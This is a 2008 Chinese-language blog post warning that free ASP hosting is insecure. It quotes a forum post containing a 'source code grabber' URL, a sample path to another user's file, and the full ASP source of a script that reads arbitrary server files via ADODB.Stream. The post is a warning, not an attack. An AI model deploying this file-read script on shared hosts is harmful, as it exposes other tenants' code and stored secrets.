2008年5月22日 星期四

免費ASP空間的迷思

參閱 : http://www.pczone.com.tw/vbb3/thread/62/40968/

我一直都在使用免費 ASP, 其實我早就知道並不安全, 不過我在意的並非程式碼被盜用(在WEB世界裡, 程式碼算是必須保護的機密嗎? 只要連上網, 完全保密就不可能了), 我在意的是資料庫被下載, 因此資料庫上鎖是第一道, 機密資料內容用密語是第二道. 總之, 重要資料如果必須 ACCESIBLE ON LINE, 就必須只有你自己看得懂之語言.

以下為引用 :

原始碼抓取程式:

http://www10.brinkster.com/ggyyggy/stream.asp

在Input PhysicalPath中輸入 \\genfs1\www10\tskoda\default.asp

只需一個Stream元件就能將您的心血化為公有財產,您還敢使用免費空間嗎?

建議大家改用動態IP來架站吧,別再讓你的心血變成公共財了~

申請動態IP架站 http://www.dslcity.net

附錄 Stream.asp的Source Code )

<% if request("B1") = "送出" then

Dim Stream:

Set Stream = server.CreateObject("ADODB.Stream")

Stream.Charset = "ascii"

Stream.Open

Stream.LoadFromFile request("T1")

GetFile = Stream.Readtext

response.write Server.HTMLEncode(GetFile)

Stream.Close

else %>

<html>

<head></head>

<title>原始碼抓取 By Maxtk</title>

<body>

<form method="POST">

<p>系統路徑為 : <%=request.servervariables("appl_physical_path")%></p>

<p><input type="text" name="T1" size="20"> Input PhysicalPath <input type="submit" value="送出" name="B1"><input type="reset" value="取消" name="B2"></p>

</form>

</body></html>

<% end if %>

沒有留言 :